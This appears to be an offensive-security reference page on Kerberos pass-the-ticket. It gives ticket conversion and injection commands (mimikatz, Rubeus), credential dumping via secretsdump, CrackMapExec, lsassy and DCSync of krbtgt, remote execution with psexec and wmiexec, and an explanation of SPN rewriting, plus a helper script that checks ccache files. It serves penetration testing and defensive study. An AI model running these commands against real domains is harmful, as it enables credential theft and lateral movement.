Pass the ticket
MITRE ATT&CK™ Sub-technique T1550.003

Theory

Kerberos tickets can either be found (cached tickets on a compromised host) or forged (overpass the hash, silver ticket and golden ticket attacks). A ticket can then be used to authenticate to a service over Kerberos without knowing any password. This is called pass the ticket. When the ticket comes from, or is used on, a UNIX-like system (where tickets are stored in a credential cache, a .ccache file), the technique is also called pass the cache.

Practice

Tip: convert ticket to UNIX <-> Windows format
Tickets can be converted between the Windows format (.kirbi, a DER-encoded KRB-CRED) and the UNIX format (.ccache, an MIT credential cache) with Impacket's ticketConverter.py.

```bash
# Windows -> UNIX
ticketConverter.py $ticket.kirbi $ticket.ccache

# UNIX -> Windows
ticketConverter.py $ticket.ccache $ticket.kirbi
```

Injecting the ticket

  • On Windows systems, tools like Mimikatz and Rubeus inject the ticket into the memory of a logon session. Native Microsoft tools then use the ticket just like a ticket obtained at logon.
  • On UNIX-like systems, the path to the .ccache file to use has to be referenced in the environment variable KRB5CCNAME.

UNIX-like

Once a ticket is obtained or created, it needs to be referenced in the KRB5CCNAME environment variable for other tools (Impacket scripts, CrackMapExec, MIT klist) to use it.

```bash
export KRB5CCNAME=$path_to_ticket.ccache
```

Windows

The simplest way of injecting the ticket is to supply the /ptt flag directly to the command used to request or create it (e.g. Rubeus asktgt, mimikatz kerberos::golden). Both mimikatz and Rubeus accept this flag. The injection can also be done manually from a ticket file: mimikatz uses kerberos::ptt for a .kirbi file and kerberos::ptc for a .ccache file, while Rubeus takes a .kirbi file (or its base64 form) through /ticket.

```
# use a .kirbi file
kerberos::ptt $ticket_kirbi_file

# use a .ccache file
kerberos::ptc $ticket_ccache_file
```

```
Rubeus.exe ptt /ticket:$ticket_kirbi_file
```

Injecting into the current logon session replaces the tickets that session already holds for the same realm. When that matters, inject into a dedicated logon session instead: Rubeus createnetonly starts a sacrificial process in a new logon session and prints its LUID, which ptt accepts through /luid (an option that requires elevation). It is then possible to list the tickets in memory using the klist command, and klist purge removes them.

Passing the ticket

  • On Windows, once Kerberos tickets are injected, they are used natively by any tool that authenticates with Kerberos, as long as the target is named by hostname (targeting an IP address makes Windows fall back to NTLM).
  • On UNIX-like systems, once the KRB5CCNAME variable is exported, the ticket can be used by tools that support Kerberos authentication. Targets must be given as hostnames (ideally FQDNs) so that a service ticket can be requested or matched, and the Impacket scripts need -no-pass next to -k, otherwise they prompt for a password.

Credentials dumping

The Impacket scripts like secretsdump (Python) have the ability to remotely dump hashes and LSA secrets from a machine.

```bash
secretsdump.py -k -no-pass $TARGET
```

CrackMapExec (Python) has the ability to do it on a set of targets (with -k, the targets must be hostnames). The bh_owned module can set targets as "owned" in BloodHound (see dumping credentials from registry hives).

```bash
crackmapexec smb $TARGETS -k --sam
crackmapexec smb $TARGETS -k --lsa
crackmapexec smb $TARGETS -k --ntds
```

Lsassy (Python) is more likely to succeed as it offers multiple dumping methods. This tool can also set targets as "owned" in BloodHound. It works standalone but also as a CrackMapExec module (see dumping credentials from lsass process memory).

```bash
crackmapexec smb $TARGETS -k -M lsassy
crackmapexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
lsassy -k $TARGETS
```

On Windows, once the ticket is injected, it is used natively when accessing a service, for example by mimikatz's DCSync to extract the krbtgt hash (the injected ticket must belong to an account with replication rights on the domain).

```
lsadump::dcsync /dc:$DomainController /domain:$DOMAIN /user:krbtgt
```

Command execution

Some Impacket scripts (Python) enable testers to execute commands on target systems with Kerberos support.

```bash
# placeholders: DOMAIN, USER and TARGET (the target's hostname, not its IP)
psexec.py -k -no-pass 'DOMAIN/USER@TARGET'
smbexec.py -k -no-pass 'DOMAIN/USER@TARGET'
wmiexec.py -k -no-pass 'DOMAIN/USER@TARGET'
atexec.py -k -no-pass 'DOMAIN/USER@TARGET'
dcomexec.py -k -no-pass 'DOMAIN/USER@TARGET'
```

CrackMapExec (Python) has the ability to do it on a set of targets.

```bash
crackmapexec winrm $TARGETS -k -x whoami
crackmapexec smb $TARGETS -k -x whoami
```

On Windows, legitimate tools like the Sysinternals PsExec (download) can then be used to open a cmd using that ticket. The target must be given by hostname so that Kerberos, and therefore the injected ticket, is used.

```
.\PsExec.exe -accepteula \\$TARGET cmd
```
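Before exporting KRB5CCNAME on a UNIX-like host, it is worth checking what the file actually is and whose ticket it holds, because the two most common causes of a failing -k run are a .kirbi pointed at by KRB5CCNAME and a target given as an IP address. The script below is an added example, not code from the page, from Impacket or from CrackMapExec: it tells a .kirbi (DER-encoded KRB-CRED, [APPLICATION 22]) from an MIT credential cache (.ccache version 3 or 4), reads the cache's default principal, and refuses IP literal targets. The sample cache it builds (principal jdoe@LAB.LOCAL, no credentials) is constructed for the demonstration.

```python
"""Pre-flight checks before pointing KRB5CCNAME at a ticket on a UNIX-like host.

Added example, not code from the page, from Impacket or from CrackMapExec. The
sample cache at the bottom is constructed; it carries no credentials."""
import ipaddress
import struct


def ticket_format(data: bytes) -> str:
    """Classify a ticket file by its leading bytes."""
    if data[:2] in (b"\x05\x04", b"\x05\x03"):   # MIT ccache version 4 / 3
        return "ccache"
    if data[:1] == b"\x76":                        # DER tag of [APPLICATION 22] KRB-CRED
        return "kirbi"
    return "unknown"


def _counted(data: bytes, off: int):
    """ccache strings: big-endian uint32 length followed by the bytes."""
    (n,) = struct.unpack(">I", data[off:off + 4])
    return data[off + 4:off + 4 + n], off + 4 + n


def ccache_default_principal(data: bytes) -> str:
    """Return 'name@REALM' for the default principal of an MIT ccache v3/v4.
    This is the identity every tool reading KRB5CCNAME will authenticate as."""
    version = data[:2]
    if version not in (b"\x05\x04", b"\x05\x03"):
        raise ValueError("not an MIT credential cache")
    off = 2
    if version == b"\x05\x04":                     # v4 inserts a tagged header block
        (header_len,) = struct.unpack(">H", data[off:off + 2])
        off += 2 + header_len
    _name_type, ncomp = struct.unpack(">II", data[off:off + 8])
    off += 8
    realm, off = _counted(data, off)
    components = []
    for _ in range(ncomp):
        component, off = _counted(data, off)
        components.append(component.decode())
    return "/".join(components) + "@" + realm.decode()


def kerberos_target_ok(target: str) -> bool:
    """Service tickets are bound to a host name (the SPN's instance part):
    with an IP literal the KDC cannot look up an SPN, so reject it early."""
    try:
        ipaddress.ip_address(target)
    except ValueError:
        return bool(target)
    return False


def ptt_env(path: str, data: bytes, target: str) -> dict:
    """Environment to run Impacket/CrackMapExec with, or a ValueError saying why not."""
    fmt = ticket_format(data)
    if fmt == "kirbi":
        raise ValueError("KRB5CCNAME needs a .ccache: run ticketConverter.py first")
    if fmt != "ccache":
        raise ValueError("unrecognised ticket file")
    if not kerberos_target_ok(target):
        raise ValueError(f"{target!r}: use the FQDN, not an IP address")
    return {"KRB5CCNAME": path, "principal": ccache_default_principal(data)}


def sample_ccache() -> bytes:
    """Constructed v4 cache: header with one DeltaTime tag (tag 1, 8 bytes),
    default principal jdoe@LAB.LOCAL, no credential records."""
    header = struct.pack(">HH", 1, 8) + b"\x00" * 8
    principal = (struct.pack(">II", 1, 1)                # NT-PRINCIPAL, 1 component
                 + struct.pack(">I", 9) + b"LAB.LOCAL"
                 + struct.pack(">I", 4) + b"jdoe")
    return b"\x05\x04" + struct.pack(">H", len(header)) + header + principal


if __name__ == "__main__":
    print(ptt_env("/tmp/jdoe.ccache", sample_ccache(), "dc01.lab.local"))
```

Run it against a real cache with `ptt_env(path, open(path, "rb").read(), target)`; the returned principal is the account the Impacket scripts will authenticate as, which is what to compare against the user you expect to be impersonating.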

Modifying the SPN

When requesting access to a service, a Service Ticket (ST) is used. It contains enough information about the user for the destination service to decide whether to grant access, without asking the Domain Controller. This information is stored in a protected blob inside the ST called the PAC (Privilege Attribute Certificate). The PAC sits in the part of the ticket that is encrypted with the service account's long-term key, so the user requesting access cannot tamper with it.
Another piece of information, stored in the ST outside of the encrypted part and therefore unprotected, is the sname. It indicates which service the ticket is meant for and is essentially the SPN (Service Principal Name) of the target service, split into two elements: the service class and the hostname.
There are multiple service classes for multiple service types (LDAP, CIFS, HTTP and so on) (more info on adsecurity.org). Since the sname is not protected, there are scenarios (e.g. a ticket obtained through constrained delegation for one specific SPN) where the service class can be modified in the ticket, giving attackers access to other types of services on the same host. The caveat is that the service must still be able to decrypt the ticket: the rewrite only works when the new service class is served by the same account as the original one, which is the case for the classes a machine account answers for (CIFS, HOST, LDAP, HTTP, ...), and not for a service running under its own dedicated account.
This technique is implemented and attempted by default in all Impacket scripts when doing pass-the-ticket: when the credential cache holds no ticket for the requested SPN, Impacket takes a service ticket for another SPN from the cache and patches its sname. Impacket calls this "AnySPN".
